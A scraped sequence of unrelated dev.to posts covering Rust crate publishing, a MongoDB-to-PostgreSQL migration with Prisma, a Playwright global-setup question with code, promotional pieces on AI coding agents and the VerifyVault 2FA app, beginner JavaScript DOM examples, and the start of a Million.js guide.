Ok, now I am ready to publish the first version of the created lib. It is exciting! I change the name of the lib to `lambda-helpers-metrics`, and set the version to `0.1.0-alpha`. After creating an account on `crates.io` and verifying my email, I am set up to publish crates.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ee0k5q0lmk9lzz23r9sk.png)

:tada: :tada: :tada:

Now I can run `cargo add lambda_helpers_metrics` in any lambda function project and add some metrics. It feels nice :)

# Summary

I built a simple library for creating metrics using the AWS EMF spec. Thanks to that, we can avoid expensive `PutMetricData` calls and simply log data in the specific shape to the console. `Clippy` helped me to catch a bunch of possible mistakes. Finally, I published the crate to `crates.io` so it can be added to a project with `cargo add`.

# Next steps

There are some things I would like to work on next:

- defining `Errors` with proper types
- tracking cold starts
- adding CI/CD

Please add a comment if you see more useful features to be added. Thanks!
szymonszym
1,909,136
Migration from NoSQL to SQL: MongoDB to PostgreSQL with Prisma
In my career as a backend developer, I've recently come across a big challenge, that of moving from a...
0
2024-07-02T16:43:46
https://dev.to/christian_birego_e9b83eaa/migration-from-nosql-to-sql-mongodb-to-postgresql-with-prisma-dem
javascript, prisma, mongodb, postgres
In my career as a backend developer, I've recently come across a big challenge: moving from a NoSQL database to an SQL database. The task turned out to be complicated, but it gave me the opportunity to learn a lot. Today I'm going to share my experience with you!

We had an application using MongoDB to store data, but for technical and maintenance reasons we decided to switch to PostgreSQL to benefit from more complex functionality and queries - and to do the migration without disrupting the user experience, which was a great challenge.

The first step was to plan the migration, so I started by studying the data structure in MongoDB in order to arrange and structure it well for the move. Then I made a relationship diagram adapted to PostgreSQL. Planning was the most crucial step, because the slightest error could lose everything or misconnect the data.

Prisma became my earliest and most valuable ally in this process. Configuring Prisma with PostgreSQL seemed easier than doing it with psql. Prisma made DB management easier by providing me with tools to create and manipulate my data in an intuitive and visual way, through a graphical interface in the browser with Prisma Studio. After defining the schema and configuration in Prisma, the migration was easier, but still delicate. I had to export the data from my NoSQL DB and import it into the SQL DB. With a little patience and care, I transferred all the data.

Once the migration was complete, we ran a series of tests to verify the presence of all the data, while optimizing the performance of the database, which was satisfactory. This migration has become the greatest technical experience I've had in my career as a backend developer.

Thanks to [hng](https://hng.tech/internship) for allowing me to express my knowledge; you can find out more about [hng](https://hng.tech/premium). Thank you for reading all the way to the end. [christian birego](https://coinkivu.com/profile/christian-birego)
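To give a flavor of the reshaping such a migration involves, here is a sketch of turning a nested MongoDB document into flat relational rows before inserting them with Prisma. The `MongoUser`/`UserRow`/`AddressRow` shapes and field names are hypothetical, not taken from the actual project:

```typescript
// A nested document as it might live in MongoDB
interface MongoUser {
  _id: string;
  name: string;
  addresses: { city: string; zip: string }[];
}

// Flat rows as they would live in PostgreSQL tables
interface UserRow { id: string; name: string }
interface AddressRow { userId: string; city: string; zip: string }

// Flatten one document into one user row plus N address rows,
// replacing the embedded array with a foreign key.
function toRelational(doc: MongoUser): { user: UserRow; addresses: AddressRow[] } {
  return {
    user: { id: doc._id, name: doc.name },
    addresses: doc.addresses.map((a) => ({
      userId: doc._id,
      city: a.city,
      zip: a.zip,
    })),
  };
}
```

In a migration script, each `toRelational` result would then be written with Prisma Client (for example via a `create` with nested writes); the exact calls depend on the schema.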
christian_birego_e9b83eaa
1,909,135
openai/whisper-large-v3-torrent
https://aitorrent.zerroug.de/openai-whisper-large-v3/
0
2024-07-02T16:43:01
https://dev.to/octobreak/openaiwhisper-large-v3-torrent-28id
ai, machinelearning, openai, beginners
https://aitorrent.zerroug.de/openai-whisper-large-v3/
octobreak
1,909,134
Advances in Deep Learning for Time Series Forecasting 2024
https://medium.com/deep-data-science/advances-in-deep-learning-for-time-series-forecasting-classifica...
0
2024-07-02T16:40:51
https://dev.to/isaacmg/advances-in-deep-learning-for-time-series-forecasting-2024-876
deeplearning, pytorch, timeseriesforecasting, opensource
https://medium.com/deep-data-science/advances-in-deep-learning-for-time-series-forecasting-classification-winter-2024-a3fd31b875b0
isaacmg
1,909,133
Issue facing with Global Setup
I am facing one issue related to the global setup and teardown approach: I have to run multiple...
0
2024-07-02T16:40:51
https://dev.to/chandansh27/issue-facing-with-global-setup-4pnk
I am facing one issue related to the global setup and teardown approach:

- I have to run multiple spec files, which are in different folders under test, and I want to log in once and log out once after all the spec files are executed.
- So I have created a `global-setup.ts` file and a `global-teardown.ts` file for storing the state; once everything is done, teardown will log out.
- I have given tags to the specific tests, created a config file where I use them, and created one test-runner file where these test cases will run.
- The setup is also wired up in `playwright.config.ts`.

Now the problem statement: when I run the command, login is done and the state is stored by global setup, and the first test case executes, but for the 2nd test case login happens again. If I comment out the globalSetup and globalTeardown in the Playwright config, all the test cases run as expected because the storage state is maintained — but this is not the ideal scenario, because when we run it in CI/CD the problem will arise again. I am sharing the code of all the files; please share expert advice (I can't share the code on git because this is an office project). [I will also share the project structure.]

`global-setup.ts`:

```ts
import { Browser, chromium, FullConfig } from '@playwright/test';
import { LoginPage } from '../../app/pages/login.page';
import * as fs from 'fs';
import { saveStorageState } from '../../../utils/utils';

export let browserConnection: Browser;
export let wsEndPoint: string;

async function globalSetup(config: FullConfig) {
  const server = await chromium.launchServer({ headless: false });
  wsEndPoint = server.wsEndpoint();
  const browser = await chromium.connect(wsEndPoint);
  browserConnection = browser;
  const context = await browser.newContext();
  const page = await context.newPage();
  const loginPage = new LoginPage(page, context);
  await loginPage.login();
  //global.__LOGIN_PAGE__ = loginPage;
  //await new Promise((resolve) => setTimeout(resolve, 3000));
  await saveStorageState(context, page);
  await context.close();
  //await browser.close();
}

export default globalSetup;
```

`global-teardown.ts`:

```ts
import { FullConfig } from '@playwright/test';
import { chromium } from '@playwright/test';
import { LoginPage } from '../../app/pages/login.page';
import { loadStorageState } from '../../../utils/utils';
import { wsEndPoint } from './global-setup';

async function globalTeardown(config: FullConfig) {
  const browser = await chromium.connect(wsEndPoint);
  const context = await browser.newContext({ storageState: 'localStorageState.json' });
  //const openPages = context.pages();
  // console.log(`Number of open tabs: ${openPages.length}`);
  // Close all open pages in the context
  // for (const page of openPages) {
  //   await page.close();
  // }
  const origin = await loadStorageState(context);
  const page = await context.newPage();
  await page.goto(origin);
  const loginPage = new LoginPage(page, context);
  await loginPage.logout();
  //await new Promise((resolve) => setTimeout(resolve, 3000));
  await page.close();
  await context.close();
  await browser.close();
}

export default globalTeardown;
```

`test-cases.config.json`:

```json
{
  "testCases": [
    {
      "file": "./src/app/tests/designers/module-designer/create-module.spec.ts",
      "tags": ["create-new-project"]
    },
    {
      "file": "./src/app/tests/designers/entity-designer/create-entity.spec.ts",
      "tags": ["test-case-1"]
    }
  ]
}
```

`test-runner.ts`:

```ts
import { exec } from 'child_process';
import { promisify } from 'util';
import * as fs from 'fs';

const execAsync = promisify(exec);

async function runTests() {
  const config = JSON.parse(fs.readFileSync('./test-cases.config.json', 'utf-8'));
  const testCases = config.testCases;
  for (const { file, tags } of testCases) {
    for (const tag of tags) {
      try {
        console.log(`Running tests in ${file} with tag @${tag}`);
        await execAsync(`npx playwright test ${file} --grep "@${tag}"`);
      } catch (error) {
        console.error(`Error running tests in ${file} with tag @${tag}:`, error);
        process.exit(1); // Exit on failure
      }
    }
  }
  console.log('All tests passed');
}

runTests().catch(err => {
  console.error(err);
  process.exit(1);
});
```

`playwright.config.ts`:

```ts
import { defineConfig, devices } from '@playwright/test';

export default defineConfig({
  globalSetup: require.resolve('./src/app/global/global-setup'),
  globalTeardown: require.resolve('./src/app/global/global-teardown'),
  use: {
    headless: false,
    channel: 'chrome',
    screenshot: 'on',
    video: 'on',
    viewport: { width: 1920, height: 970 },
    launchOptions: {
      slowMo: 3500,
      args: ['--window-position=-5,-5'],
    },
    trace: 'on',
  },
  timeout: 1200000,
  testDir: 'src/app/tests',
  fullyParallel: false,
  forbidOnly: !!process.env.CI,
  retries: process.env.CI ? 2 : 0,
  workers: process.env.CI ? 1 : 1,
  reporter: 'html',
  projects: [
    {
      name: 'chromium',
      use: { ...devices['Desktop Chrome'], storageState: './localStorageState.json' },
    },
    // Define other projects as needed...
  ],
});
```

1st spec file:

```ts
import { test, expect, Page } from '@playwright/test';
import moduleDesignerTestConfig from "../../../../app/data/module-designer-test.config.json";
import { MenuNavigatorPage } from '../../../pages/menu-navigator.page';
import { ModuleDesignerPage } from '../../../pages/designers/module-designer/module-designer.page';
import * as fs from 'fs';
import { loadStorageState } from '../../../../../utils/utils';
import { LoginPage } from '../../../pages/login.page';

test.describe.configure({ mode: 'serial' });

let menuNavigatorPage: MenuNavigatorPage;
let moduleDesignerPage: ModuleDesignerPage;

test.beforeAll(async ({ browser }) => {
  const context = await browser.newContext({ storageState: 'localStorageState.json' });
  const page = await context.newPage();
  const origin = await loadStorageState(context);
  await page.goto(origin);
  menuNavigatorPage = new MenuNavigatorPage(page, context);
  moduleDesignerPage = new ModuleDesignerPage(page, context);
});

test('Create New Module by creating new project @create-new-project', async () => {
  const projectName = await moduleDesignerPage.projectDesignerPage.createProject();
  if (projectName) {
    const moduleName = await moduleDesignerPage.createNewModule(projectName);
    expect(moduleName).toContain(moduleDesignerTestConfig.module.moduleName);
  } else {
    throw new Error('Failed to create project');
  }
});

test('Create New Module in existing project', async () => {
  const projectName = moduleDesignerTestConfig.module.projectNameForModule;
  if (projectName) {
    const moduleName = await moduleDesignerPage.createNewModule(projectName);
    expect(moduleName).not.toBeNull();
  } else {
    throw new Error('Project name for module is not defined in the config');
  }
});
```

2nd spec file:

```ts
import { test, expect, BrowserContext, Page } from '@playwright/test';
import { LoginPage } from '../../../pages/login.page';
import testConfig from "../../../../../test.config.json";
import { MenuNavigatorPage } from '../../../pages/menu-navigator.page';
import { getRandomNumber, loadStorageState } from '../../../../../utils/utils';
import { EntityDesignerPage } from '../../../pages/designers/entity-designer/entity-designer.page';
import { TestSuite } from '../../../common/test-suite.enum';
import entityDesignerTestConfig from "../../../data/entity-designer-test.config.json";
import { IEntity } from '../../../pages/designers/entity-designer/entity-designer.model';
import * as fs from 'fs';

test.describe(TestSuite.entityDesigner, () => {
  test.describe.configure({ mode: 'serial' });

  let menuNavigatorPage: MenuNavigatorPage;
  let entityDesignerPage: EntityDesignerPage;
  let context: BrowserContext;
  let page: Page;

  test.beforeAll(async ({ browser }) => {
    const context = await browser.newContext({ storageState: 'localStorageState.json' });
    const page = await context.newPage();
    const origin = await loadStorageState(context);
    await page.goto(origin);
    menuNavigatorPage = new MenuNavigatorPage(page, context);
    entityDesignerPage = new EntityDesignerPage(page, context);
  });

  // test.afterEach(async ({ page, context }) => {
  //   await loginPage.logout();
  // });

  test('Create New Entity with main table by creating new project @test-case-1', async () => {
    let projectName = await entityDesignerPage.projectDesignerPage?.createProject();
    let entityName = await entityDesignerPage.createNewEntity(projectName as string, testConfig.entityTest.entityName + getRandomNumber());
    expect(entityName).toContain(testConfig.entityTest.entityName);
  });

  test('Create New Entity with main table using existing project', async () => {
    let entityName = await entityDesignerPage.createNewEntity(testConfig.entityTest.projectNameForEntity, testConfig.entityTest.entityName + getRandomNumber());
    expect(entityName).toContain(testConfig.entityTest.entityName);
  });

  test('Create Standard Entity In Standard Automation Project', async () => {
    let entityName = await entityDesignerPage.createNewEntity(testConfig.standard.projectName, testConfig.standard.entity.entityName);
    expect(entityName).toBe(testConfig.standard.entity.entityName);
  });

  test('Create New Entity with main table for Standard project', async () => {
    const entity: IEntity = entityDesignerTestConfig.entity;
    let entityName = await entityDesignerPage.createNewEntityForStandardProject(testConfig.standard.projectName, entity);
    expect(entityName).toContain(testConfig.standard.entity.entityName);
  });
});
```

This is the common utils file for the storage-state functions:

```ts
import { ControlEvent, HttpVerb } from "../src/app/common/common.model";
import { Response } from "playwright-core";
import { BrowserContext, Page } from '@playwright/test';
import * as fs from 'fs';

export async function saveStorageState(context: BrowserContext, page: Page) {
  // Save localStorage state
  await context.storageState({ path: 'localStorageState.json' });
  // Get session storage and store as a file
  const sessionStorage: any = await page.evaluate(() => JSON.stringify(sessionStorage));
  fs.writeFileSync('sessionStorage.json', sessionStorage, 'utf-8');
}

export async function loadStorageState(context: BrowserContext) {
  // Load the saved storage state
  const savedStorageStateStr = fs.readFileSync('localStorageState.json', 'utf8');
  const savedStorageState = JSON.parse(savedStorageStateStr);
  // Manually set cookies
  await context.addCookies(savedStorageState.cookies);
  const origin = savedStorageState.origins[0].origin;
  // Manually set session storage
  const sessionStorage = JSON.parse(fs.readFileSync('sessionStorage.json', 'utf-8'));
  await context.addInitScript(storage => {
    for (const [key, value] of Object.entries(storage)) {
      window.sessionStorage.setItem(key, value as string);
    }
  }, sessionStorage);
  return origin;
}
```

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lkjcwd1vhsjevcw47k9t.JPG)
chandansh27
1,909,132
Evolving Landscape Of Software Development With AI Agents
The world of software development is undergoing a revolution driven by Artificial Intelligence (AI)...
0
2024-07-02T16:40:17
https://www.techdogs.com/td-articles/trending-stories/evolving-landscape-of-software-development-with-ai-agents
softwaredevelopment, ai, technology, programming
The world of software development is undergoing a revolution driven by [Artificial Intelligence (AI)](https://www.techdogs.com/category/ai) agents. These intelligent assistants are transforming how we create software, automating tasks, improving efficiency, and opening doors to exciting new possibilities.

AI agents go beyond simply writing code. They can analyze existing codebases to identify patterns and generate new code, review code for errors and suggest improvements, and even track and fix bugs automatically. This frees up developers to focus on more complex tasks and strategic thinking. Let's delve deeper into how AI agents are changing the game in software development, exploring areas like natural language interfaces, code audits, and automatic error tracking.

**How Artificial Intelligence Started**

While "Tenet" depicted a grand heist across time, AI tools did not suddenly come to dominate [software development](https://www.techdogs.com/td-articles/curtain-raisers/introduction-to-software-development); they moved back and forth through our legacy systems, gradually transforming them. The result has been a complete change in how software is written, debugged, and managed.

Before diving into the fascinating advances of AI agents, it is worth tracing the roots of this AI-powered revolution. Although theories of artificial intelligence have existed for decades, it is only recently that AI began making a considerable impact on software development. Advances in machine learning, [Natural Language Processing (NLP)](https://www.techdogs.com/td-articles/curtain-raisers/natural-language-processing-nlp-software-101), and deep learning have produced intelligent AI programs capable of taking on tasks, such as programming, that once belonged exclusively to humans.
**How Do AI Agents Enable Better Software Development?**

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ugb333h8ij26ha0d08mm.gif)

[Source](https://tenor.com/view/that-part-is-a-little-dramatic-dramatic-overreacting-overreached-a-little-much-gif-17341248)

- **Automated Code Generation** - The tables have turned on automation, much as time is reversed in "Tenet". By studying existing codebases, AI agents can reverse-engineer the past and create new code based on historical patterns. Learning from existing code speeds up development and leads to better generated codebases. It is worth noting how tools such as GPT-3 have managed to write pieces of software from plain-English instructions describing what someone wants their program to do.

- **Code Review and Quality Assurance** -

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1a85v2ya88yfin2zq6e5.jpg)

[Source](https://upload.wikimedia.org/wikipedia/commons/7/71/Sator_Square_at_Opp%C3%A8de.jpg)

AI agents have made the code review process almost palindromic, like the Sator Square above: every line written gets scrutinized thoroughly in every direction. They identify errors, detect vulnerabilities, and verify that coding standards have been strictly followed. These agents do not just flag faults such as bugs or potential security lapses that could expose users' sensitive information if left unchecked; they also suggest how best to optimize existing code, making the exercise easier for developers while reducing the chance of errors.

- **Predictive Analytics** - Software development projects frequently face the challenge of uncertainty. AI agents simplify forecasting of project metrics, in particular development time, how resources should be allocated, and possible bottlenecks. By drawing on past data and the current state of the project, they help managers and programmers improve their judgment. Predictive analytics can also anticipate features users may request, or locate areas for improvement based on user behaviour and preferences.

- **Natural Language Interfaces** - One of the most fascinating uses of AI in programming is natural language interfaces. Developers no longer have to remember complicated syntax; they can simply give instructions to the AI in their everyday language. The developer describes what they want done, and the AI agent finds or produces the code needed for the task, all the way to the deployment pipeline.

- **Bug Detection and Resolution** - Every software project requires that issues be found and fixed. AI agents watch over the different stages of software development, identify problems, and propose ways of solving them. Their ability to correct simple defects on their own is key: it frees developers and engineers to spend their time on other things instead of manually chasing bugs, a process that would otherwise drag on given the complexity of any major application today.
**The Future of AI in Software Development**

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/72vri5c03hr0frx53swf.gif)

[Source](https://tenor.com/view/it-hasnt-happened-yet-not-yet-woah-shocked-john-david-washington-gif-15852379)

Surveying the changing landscape of programming shaped by AI-based software agents is like working through the time puzzles of "Tenet": it lets us peer at tomorrow. As AI development continues alongside AI's growing creativity, it will help us produce original computer programs among other creations. AI methods will also accelerate collaboration: by supporting knowledge sharing and identifying individuals with particular skills, AI will promote knowledge transfer and cooperation among different developers.

**Conclusion** - The shift towards AI-guided software development clearly depicts how revolutionary AI can be for the industry. AI assistants save time, enhance collaboration, and make code better. It is essential that ethics drive their use, so as to strike a balance between automation and human creativity, among other things. Let us embrace them and be ready for a future of software development powered by AI. The temporal dynamics of "Tenet" may be science fiction, but the future of software development with AI agents is an exhilarating reality!

For further details, please read the full article [here](https://www.techdogs.com/td-articles/trending-stories/evolving-landscape-of-software-development-with-ai-agents).
Dive into our content repository of the latest [tech news](https://www.techdogs.com/resource/tech-news), a diverse range of articles spanning [introductory guides](https://www.techdogs.com/resource/td-articles/curtain-raisers), product reviews, trends and more, along with engaging interviews, up-to-date [AI blogs](https://www.techdogs.com/category/ai) and hilarious [tech memes](https://www.techdogs.com/resource/td-articles/tech-memes)! Also explore our collection of [branded insights](https://www.techdogs.com/resource/branded-insights) via informative [white papers](https://www.techdogs.com/resource/white-papers), enlightening case studies, in-depth [reports](https://www.techdogs.com/resource/reports), educational [videos ](https://www.techdogs.com/resource/videos)and exciting [events and webinars](https://www.techdogs.com/resource/events) from leading global brands. Head to the **[TechDogs](https://www.techdogs.com/) homepage** to Know Your World of technology today!
td_inc
1,908,821
Unveiling the Truth: Debunking Myths and Misconceptions about 2FA
In the ever-evolving landscape of cybersecurity, two-factor authentication (2FA) stands as a beacon...
0
2024-07-02T16:38:42
https://dev.to/verifyvault/unveiling-the-truth-debunking-myths-and-misconceptions-about-2fa-2a1f
opensource, security, cybersecurity, github
In the ever-evolving landscape of cybersecurity, two-factor authentication (2FA) stands as a beacon of hope against data breaches and identity theft. Yet, despite its crucial role in safeguarding our online accounts, there are numerous myths and misconceptions that surround this powerful security measure. Let's dive into the facts and dispel the myths to ensure you understand the true value of 2FA.

#### **<u>Myth #1: 2FA is Only for Tech-Savvy Users</u>**

One of the most common misconceptions about 2FA is that it's complicated and only suitable for tech enthusiasts. In reality, 2FA has become incredibly user-friendly over the years. Many platforms offer simple options like SMS codes or push notifications that require just a tap on your smartphone. It adds an extra layer of security without adding complexity.

#### **<u>Myth #2: 2FA is Vulnerable to Hacks</u>**

Some believe that 2FA methods, particularly SMS codes, are susceptible to interception or SIM swapping attacks. While these risks exist, modern 2FA solutions, such as authenticator apps like VerifyVault, use time-based one-time passwords (TOTP) that are not transmitted over the internet. This makes them significantly more secure than SMS-based methods.

#### **<u>Myth #3: 2FA is Annoying and Time-Consuming</u>**

Another myth is that 2FA is a hassle that slows down access to your accounts. While it does add an extra step, the added security far outweighs the minimal inconvenience. Most authentication prompts are quick and seamless, especially with authenticator apps that generate codes instantly.

#### **<u>Myth #4: 2FA Provides Bulletproof Security</u>**

While 2FA drastically enhances your account's security, it's not invulnerable. Phishing attacks, where malicious actors trick users into revealing their credentials, can bypass 2FA. Therefore, it's crucial to remain vigilant and verify the authenticity of requests even when using 2FA.
### **<u>Introducing VerifyVault: Your Reliable 2FA Companion</u>**

If you're ready to step up your online security game, consider using VerifyVault—a free and open-source 2FA application designed for Windows and soon Linux users. Unlike many commercial solutions, VerifyVault prioritizes privacy and transparency. Here’s why you should give it a try:

- **Free and Open Source:** No cost and complete transparency in its codebase.
- **Offline and Encrypted:** Works offline for enhanced security, and all data is encrypted to protect your accounts.
- **Password Lock and Automatic Backups:** Adds an extra layer of security with a password lock feature and ensures your accounts are always backed up.
- **Easy Account Management:** Import and export your accounts seamlessly via QR codes or files.

Don't let myths deter you from adopting this essential security measure. Start using VerifyVault today and fortify your online presence with robust two-factor authentication. Your accounts deserve the best protection, and VerifyVault delivers exactly that.

Download [VerifyVault](https://github.com/VerifyVault) now and take control of your online security.

[VerifyVault Beta v0.2.2 Direct Download](https://github.com/VerifyVault/VerifyVault/releases/tag/Beta-v0.2.2)

_Stay informed. Stay secure. Embrace 2FA with VerifyVault. Your accounts will thank you._
verifyvault
1,909,091
10 Fun JavaScript Ideas to Try Today
JavaScript is a powerful programming language that allows developers to build dynamic and interactive...
0
2024-07-02T16:37:48
https://dev.to/mukeshb/10-fun-javascript-ideas-to-try-today-1gha
javascript, webdev, html, bitcoin
JavaScript is a powerful programming language that allows developers to build dynamic and interactive web applications. Whether you're just starting out or have years of experience, working on real projects is a great way to improve your JavaScript skills. This guide presents a collection of practical JavaScript examples that cover a wide range of common tasks and features for web applications. Each example includes code snippets along with explanations of how they work. By exploring these, you'll gain hands-on experience with key JavaScript concepts and learn how to create more interactive and user-friendly web pages.

**Examples**

**Finding Operating System Details**

```js
const os = navigator.platform;
alert("Your Operating System: " + os);
```

- `navigator.platform`: This property returns a string representing the platform (operating system) of the browser.
- The alert function is used to display a pop-up box that shows the detected operating system. This is useful for understanding the environment in which your web application is running.

**Detecting User's Browser**

```js
const browser = navigator.userAgent;
alert("Your Browser: " + browser);
```

- `navigator.userAgent`: This property returns the user-agent string of the browser. It contains information about the browser version, operating system, and other details.
- This information can be used for browser-specific functionality or for analytics purposes to understand what browsers your users are using.

**Creating a Digital Clock**

```html
<div id="clock"></div>
<script>
  setInterval(() => {
    const now = new Date();
    document.getElementById('clock').innerText = now.toLocaleTimeString();
  }, 1000);
</script>
```

- `<div id="clock"></div>`: This is an HTML element where the current time will be displayed.
- `setInterval(callback, 1000)`: This JavaScript function repeatedly calls the callback function every 1000 milliseconds (1 second).
- `new Date()`: Creates a new Date object representing the current date and time.
- `now.toLocaleTimeString()`: Formats the current time as a human-readable string.
- `document.getElementById('clock').innerText = now.toLocaleTimeString()`: Updates the content of the div with the current time.

**Form Validation**

```html
<html>
<head>
  <title>Form Validation</title>
</head>
<body>
  <form id="myForm">
    <input type="text" id="name" placeholder="Enter your name">
    <button type="submit">Submit</button>
  </form>
  <script>
    document.getElementById('myForm').addEventListener('submit', function(event) {
      const name = document.getElementById('name').value;
      if (!name) {
        alert("Name is required");
        event.preventDefault();
      }
    });
  </script>
</body>
</html>
```

- `<form id="myForm">`: A form element where users can input their name.
- `document.getElementById('myForm').addEventListener('submit', function(event) { ... })`: Adds an event listener to the form's submit event.
- `document.getElementById('name').value`: Gets the value entered in the input field.
- `if (!name) { ... }`: Checks if the input field is empty.
- `alert("Name is required")`: Displays an alert if the input field is empty.
- `event.preventDefault()`: Prevents the form from submitting if the validation fails, ensuring the user corrects their input before proceeding.

**Displaying Mouse Coordinates**

```html
<div id="coords">Move your mouse over this area.</div>
<script>
  document.addEventListener('mousemove', function(event) {
    const coords = `X: ${event.clientX}, Y: ${event.clientY}`;
    document.getElementById('coords').innerText = coords;
  });
</script>
```

- `<div id="coords">Move your mouse over this area.</div>`: A div element to display the mouse coordinates.
- `document.addEventListener('mousemove', function(event) { ... })`: Adds an event listener to the document's mousemove event.
- ``const coords = `X: ${event.clientX}, Y: ${event.clientY}`;``: Gets the mouse coordinates relative to the viewport.
- `document.getElementById('coords').innerText = coords`: Updates the div with the current mouse coordinates.

**Generating Random Numbers**

```html
<button id="generate">Generate Random Number</button>
<p id="randomNumber"></p>
<script>
  document.getElementById('generate').addEventListener('click', function() {
    const randomNumber = Math.floor(Math.random() * 100) + 1;
    document.getElementById('randomNumber').innerText = "Random Number: " + randomNumber;
  });
</script>
```

- `<button id="generate">Generate Random Number</button>`: A button to generate a random number.
- `<p id="randomNumber"></p>`: A paragraph to display the generated random number.
- `document.getElementById('generate').addEventListener('click', function() { ... })`: Adds a click event listener to the button.
- `const randomNumber = Math.floor(Math.random() * 100) + 1;`: Generates a random number between 1 and 100.
- `document.getElementById('randomNumber').innerText = "Random Number: " + randomNumber;`: Displays the generated random number in the paragraph.

**Changing Background Color Randomly**

```html
<button id="randomColor">Change Background Color</button>
<script>
  document.getElementById('randomColor').addEventListener('click', function() {
    const colors = ['red', 'green', 'blue', 'yellow', 'purple'];
    const randomColor = colors[Math.floor(Math.random() * colors.length)];
    document.body.style.backgroundColor = randomColor;
  });
</script>
```

- `<button id="randomColor">Change Background Color</button>`: A button to change the background color.
- `document.getElementById('randomColor').addEventListener('click', function() { ... })`: Adds a click event listener to the button.
- `const colors = ['red', 'green', 'blue', 'yellow', 'purple'];`: An array of color options.
- `const randomColor = colors[Math.floor(Math.random() * colors.length)];`: Selects a random color from the array.
- `document.body.style.backgroundColor = randomColor;`: Sets the body's background color to the randomly selected color.

**Building a To-Do List**

```html
<input type="text" id="taskInput" placeholder="Enter a task">
<button id="addButton">Add Task</button>
<ul id="taskList"></ul>
<script>
  document.getElementById('addButton').addEventListener('click', function() {
    const task = document.getElementById('taskInput').value;
    const li = document.createElement('li');
    li.innerText = task;
    document.getElementById('taskList').appendChild(li);
  });
</script>
```

- `<input type="text" id="taskInput" placeholder="Enter a task">`: An input field for entering tasks.
- `<button id="addButton">Add Task</button>`: A button to add the task to the list.
- `<ul id="taskList"></ul>`: An unordered list to display the tasks.
- `document.getElementById('addButton').addEventListener('click', function() { ... })`: Adds an event listener to the button's click event.
- `document.getElementById('taskInput').value`: Gets the value entered in the input field.
- `const li = document.createElement('li')`: Creates a new list item element.
- `li.innerText = task`: Sets the text of the list item to the entered task.
- `document.getElementById('taskList').appendChild(li)`: Adds the new list item to the task list.

**Creating a Dropdown Menu**

```html
<select id="dropdown">
  <option value="Option 1">Option 1</option>
  <option value="Option 2">Option 2</option>
  <option value="Option 3">Option 3</option>
</select>
<button id="showSelection">Show Selected Option</button>
<script>
  document.getElementById('showSelection').addEventListener('click', function() {
    const selectedOption = document.getElementById('dropdown').value;
    alert("Selected Option: " + selectedOption);
  });
</script>
```

- `<select id="dropdown">`: A dropdown menu with three options.
- `<button id="showSelection">Show Selected Option</button>`: A button to show the selected option from the dropdown menu.
- `document.getElementById('showSelection').addEventListener('click', function() { ... })`: Adds a click event listener to the button.
- `const selectedOption = document.getElementById('dropdown').value;`: Gets the value of the selected option.
- `alert("Selected Option: " + selectedOption);`: Displays an alert with the selected option.

**Toggling Visibility of an Element**

```html
<div id="toggleDiv">This is a toggleable div.</div>
<button id="toggleButton">Toggle Visibility</button>
<script>
  document.getElementById('toggleButton').addEventListener('click', function() {
    const div = document.getElementById('toggleDiv');
    if (div.style.display === 'none') {
      div.style.display = 'block';
    } else {
      div.style.display = 'none';
    }
  });
</script>
```

- `<div id="toggleDiv">This is a toggleable div.</div>`: A div element with some text that we want to show or hide.
- `<button id="toggleButton">Toggle Visibility</button>`: A button to toggle the visibility of the div.
- `document.getElementById('toggleButton').addEventListener('click', function() { ... })`: Adds a click event listener to the button.
- `const div = document.getElementById('toggleDiv');`: Selects the div element.
- `if (div.style.display === 'none') { div.style.display = 'block'; } else { div.style.display = 'none'; }`: Toggles the display property of the div between 'none' (hidden) and 'block' (visible).
mukeshb
1,908,039
Million.js adoption guide: Overview, examples, and alternatives
Written by Isaac Okoro✏️ The frontend ecosystem has seen lots of recent improvements for making...
0
2024-07-02T16:37:42
https://blog.logrocket.com/million-js-adoption-guide
millionjs, webdev
**Written by [Isaac Okoro](https://blog.logrocket.com/author/isaacjunior/)✏️**

The frontend ecosystem has seen lots of recent improvements for making development easier and increasing productivity. Some of these improvements have come through the introduction of faster tools and frameworks like Svelte, Bun, Preact, Blitz, and more.

In this guide, we will take a look at one such framework called Million.js. We’ll look at why it was created, how it works, and the pros and cons that may arise from using this new framework. By the end of this article, you’ll understand how and when to adopt Million.js strategically in your projects.

* * *

## What is Million.js?

Million.js is an open source, minimalistic JavaScript compiler designed to revolutionize and improve React performance. It lets you write JSX code like React, but compiles your code so you ship a lot less JavaScript to the browser.

Created by Aiden Bai, Million uses a granular approach when updating the DOM. This works differently from how React handles DOM updates, where it updates the entire DOM tree. Million’s approach reduces memory usage and improves rendering speed and performance without sacrificing flexibility.

Million.js achieves these feats by utilizing a special feature known as blocks. A block is a lightweight and highly performant higher-order component (HOC) optimized for rendering speed that you can use as a React component.

#### _Further reading:_

* [Understanding the virtual DOM in React](https://blog.logrocket.com/virtual-dom-react/)
* [Understanding React higher order components](https://blog.logrocket.com/understanding-react-higher-order-components/)

* * *

## Why use Million.js?

Million.js offers a revolutionary approach when dealing with millions of data points compared to frameworks that employ traditional virtual DOM approaches.
Let's see some reasons why you should consider using Million.js:

* **Blazing fast speed**: Million.js utilizes specialized data structures and a unique diffing strategy, making it extremely fast. Million analyzes and automatically compiles your React code into optimized HOCs before rendering them, making the code 70 percent faster compared to React code written without Million.js
* **Low memory usage**: Million reduces memory usage and increases performance by using less than half the memory that React does for every single operation. By using observers on DOM nodes to track state changes more effectively, Million does away with the need for a virtual DOM, thereby reducing memory usage and performance overhead
* **DX**: Since Million.js aims to be a simple and lightweight compiler for React applications, developer experience was a major factor in its creation. It is easy to set up and use, both for new developers and those with plenty of React experience
* **Integrations**: You can integrate Million.js seamlessly not only with React, but also with React frameworks like Astro, Gatsby, and Next.js
* **Documentation**: The comprehensive and user-friendly Million.js documentation provides clear guidance on using the framework effectively. The docs also cover installation instructions, API references, and usage examples, making it easy for developers to get started and integrate Million.js into their projects

#### _Further reading:_

* [Million: Build apps with JSX faster than React and Preact](https://blog.logrocket.com/million-js-build-apps-jsx-faster-react-preact/)

* * *

## Drawbacks of using Million.js

While Million.js offers advantages like low memory usage and performance optimization, it's essential to consider potential drawbacks before deciding to use it in a project:

* **Community & ecosystem**: As a newer tool, Million.js has a relatively limited ecosystem compared to more established frameworks. You may face challenges finding community support, third-party plugins, or comprehensive documentation
